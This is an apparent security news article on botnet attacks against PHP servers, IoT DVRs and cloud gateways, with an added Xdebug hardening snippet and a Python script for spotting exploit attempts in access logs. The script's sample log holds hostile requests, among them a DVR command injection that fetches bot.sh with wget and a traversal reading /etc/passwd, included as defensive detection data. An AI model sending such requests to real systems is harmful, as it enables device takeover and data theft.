Cybersecurity researchers have warned about a major surge in automated botnet attacks aimed at PHP servers, IoT devices, and cloud gateways. The new wave of activity is primarily driven by well-known botnets such as Mirai, Gafgyt, and Mozi, according to a recent report from the Qualys Threat Research Unit (TRU).
The Growing Threat
These botnets exploit known CVEs and cloud misconfigurations to compromise exposed systems and enlist them into their networks. PHP-based servers are prime targets because they underpin widely deployed content management systems such as WordPress and Craft CMS, whose installations are frequently misconfigured, running outdated plugins, or storing files insecurely.
Vulnerabilities Exploited
Some of the key PHP-related vulnerabilities under attack include:
- CVE-2017-9841 – Remote code execution in PHPUnit
- CVE-2021-3129 – Remote code execution in Laravel
- CVE-2022-47945 – Remote code execution in ThinkPHP Framework
Researchers also spotted requests carrying the query string /?XDEBUG_SESSION_START=phpstorm, a sign that attackers are probing for Xdebug on production hosts. That parameter asks Xdebug to start a debugging session for the request; when the extension is configured to connect back to the requesting host, the server opens a DBGp connection to the attacker, who can then evaluate PHP in the context of the application.
Leaving debugging tools like Xdebug active in production can therefore expose sensitive data, reveal application logic, or hand an attacker code execution outright.
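The following php.ini fragment is an added illustration, not configuration taken from the Qualys report or from any affected site. It shows the Xdebug 3 settings that make the trigger above dangerous, beside the production setting that neutralises it; the directive names are Xdebug's own, the choice of values is the example's.

```ini
; --- Risky: Xdebug loaded on a production host and told to connect back to
; --- whoever sends the XDEBUG_SESSION_START trigger (example configuration).
zend_extension=xdebug
xdebug.mode=debug
xdebug.start_with_request=trigger   ; any request with XDEBUG_SESSION_START starts a session
xdebug.discover_client_host=1       ; connect to the requesting IP instead of a fixed client_host
xdebug.client_port=9003             ; DBGp port; the attacker listens here and sends eval commands
; (Xdebug 2 equivalents: xdebug.remote_enable=1, xdebug.remote_connect_back=1, port 9000)

; --- Hardened: either do not load the extension on production at all ...
;zend_extension=xdebug
; --- ... or, if the package must stay installed, turn every mode off so the
; --- trigger parameter is ignored and no outbound DBGp connection is ever made.
xdebug.mode=off
```

After changing the setting, confirm the result from the host itself rather than trusting the file: `php -i | grep -i xdebug` should show `xdebug.mode => off` or no Xdebug section at all, and a request carrying the trigger should produce no outbound connection on port 9003.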
IoT Devices Under Siege
Beyond PHP servers, attackers are also targeting IoT systems and cloud services. Commonly exploited weaknesses include:
- CVE-2022-22947 – RCE in Spring Cloud Gateway
- CVE-2024-3721 – Command injection in TBK DVR-4104 and DVR-4216
- MVPower TV-7104HE DVR Misconfiguration – Allows unauthenticated command execution
The scanning and exploitation attempts are often traced back to major cloud infrastructures like AWS, Google Cloud, Microsoft Azure, and DigitalOcean, showing that attackers abuse legitimate cloud platforms to obscure their origin and blend in with expected traffic.
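The indicators listed in both sections above are visible in ordinary web-server access logs. The script below is an added example, not tooling from Qualys or from the report: it parses combined-format log lines, URL-decodes each request target, and flags the request paths commonly associated with each item (eval-stdin.php for PHPUnit, /_ignition/execute-solution for Laravel, a traversal in the ThinkPHP lang parameter, the Xdebug trigger, the Spring Cloud Gateway actuator route, /device.rsp on the TBK DVRs and /shell on the MVPower DVR). The exact paths and the log lines are assumptions constructed for the example; the IPs are documentation ranges.

```python
"""Triage access logs for the botnet exploit attempts described above.

Added example; the indicator paths are assumed exploit URIs, not data
from the report, and SAMPLE_LOG is constructed.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Request-line parser for Apache/nginx "combined" access log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# (pattern, label); matched against the URL-decoded request target so that
# encoded traversal such as ..%2F is caught as well.  Paths are assumptions.
INDICATORS = [
    (re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php"),
     "CVE-2017-9841 PHPUnit eval-stdin.php"),
    (re.compile(r"/_ignition/execute-solution"),
     "CVE-2021-3129 Laravel Ignition"),
    (re.compile(r"[?&]lang=\.\.[/\\]"),
     "CVE-2022-47945 ThinkPHP lang traversal"),
    (re.compile(r"XDEBUG_SESSION_START="),
     "Xdebug session trigger"),
    (re.compile(r"/actuator/gateway/routes/"),
     "CVE-2022-22947 Spring Cloud Gateway actuator"),
    (re.compile(r"^/device\.rsp\?"),
     "CVE-2024-3721 TBK DVR device.rsp"),
    (re.compile(r"^/shell\?"),
     "MVPower TV-7104HE DVR /shell"),
]


def classify(target):
    """Return the indicator labels matching one request target."""
    decoded = unquote(target)
    return [label for pat, label in INDICATORS if pat.search(decoded)]


def triage(lines):
    """Parse log lines and return one hit dict per matched indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for label in classify(m["target"]):
            hits.append({"ip": m["ip"], "label": label,
                         "status": int(m["status"]), "target": m["target"]})
    return hits


def by_source(hits):
    """Count hits per source IP; one IP running down the whole list is a bot."""
    return Counter(h["ip"] for h in hits)


def successful(hits):
    """Hits that did not get a 4xx/5xx: the ones to investigate first."""
    return [h for h in hits if h["status"] < 400]


# Constructed sample: two PHP probes, an Xdebug/ThinkPHP pair that got 200s,
# a DVR/gateway sweep, and two benign requests.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Nov/2025:10:01:02 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Nov/2025:10:01:03 +0000] "POST /_ignition/execute-solution HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Nov/2025:10:02:11 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '198.51.100.7 - - [12/Nov/2025:10:02:12 +0000] "GET /index.php?lang=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "python-requests/2.31"',
    '192.0.2.55 - - [12/Nov/2025:10:03:40 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.55 - - [12/Nov/2025:10:03:41 +0000] "GET /shell?cd+/tmp;wget+http://198.51.100.7/bot.sh HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.55 - - [12/Nov/2025:10:03:42 +0000] "POST /actuator/gateway/routes/hacktest HTTP/1.1" 405 0 "-" "-"',
    '203.0.113.200 - - [12/Nov/2025:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.200 - - [12/Nov/2025:10:04:01 +0000] "GET /wp-content/uploads/hero.jpg HTTP/1.1" 200 80000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for ip, n in by_source(found).most_common():
        print(f"{ip}: {n} indicator hit(s)")
    for h in successful(found):
        print(f"INVESTIGATE {h['ip']} {h['status']} {h['label']}: {h['target']}")
```

Two points of the design matter in practice. Matching runs on the decoded target, otherwise the ThinkPHP traversal written as `..%2F` slips past a literal `../` check. And a 404 against eval-stdin.php is background noise from mass scanning, whereas a 200 for the Xdebug trigger or the lang traversal means the host answered the probe and deserves a look before anything else.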
Low Skill, High Impact
“Today’s threat actors don’t need to be highly sophisticated to be effective,” said Qualys.
With access to readily available exploit kits, botnet frameworks, and scanning tools, even entry-level hackers can cause massive disruption.
How to Protect Your Systems
Security experts recommend the following steps:
- Keep all devices and software up to date
- Disable debug tools and development frameworks in production
- Store secrets securely using AWS Secrets Manager or HashiCorp Vault
- Restrict public access to cloud environments, in particular management interfaces, actuator endpoints, and device web consoles that should never face the internet
The New Face of Botnets
According to James Maude, Field CTO at BeyondTrust, botnets are evolving beyond DDoS and cryptomining:
“Botnets now play a critical role in identity-based attacks like credential stuffing and password spraying. They can even evade geolocation-based defenses by mimicking legitimate user activity.”
By hijacking routers and IoT devices, attackers gain thousands of residential IP addresses from which to send traffic, so IP-reputation filters, geolocation rules, and login-anomaly detection see what looks like ordinary home users rather than a single hostile source.
AISURU: The TurboMirai Botnet
In a related disclosure, NETSCOUT identified a new DDoS-for-hire botnet dubbed AISURU, which belongs to a new malware class called TurboMirai.
This botnet can launch massive DDoS attacks exceeding 20 Tbps, leveraging consumer-grade routers, CCTV systems, and DVRs.
AISURU also includes a residential proxy network, allowing paying users to route their traffic through compromised devices. This provides anonymity, geographical masking, and the ability to blend with regular network activity — making detection much harder.
Final Thoughts
The rise of automated botnet attacks shows how easily threat actors can weaponize common misconfigurations and unpatched systems.
In 2025’s interconnected world, basic hygiene — like patching, restricting exposure, and securing credentials — remains the best defense.
As these botnets continue to evolve, so must our defenses.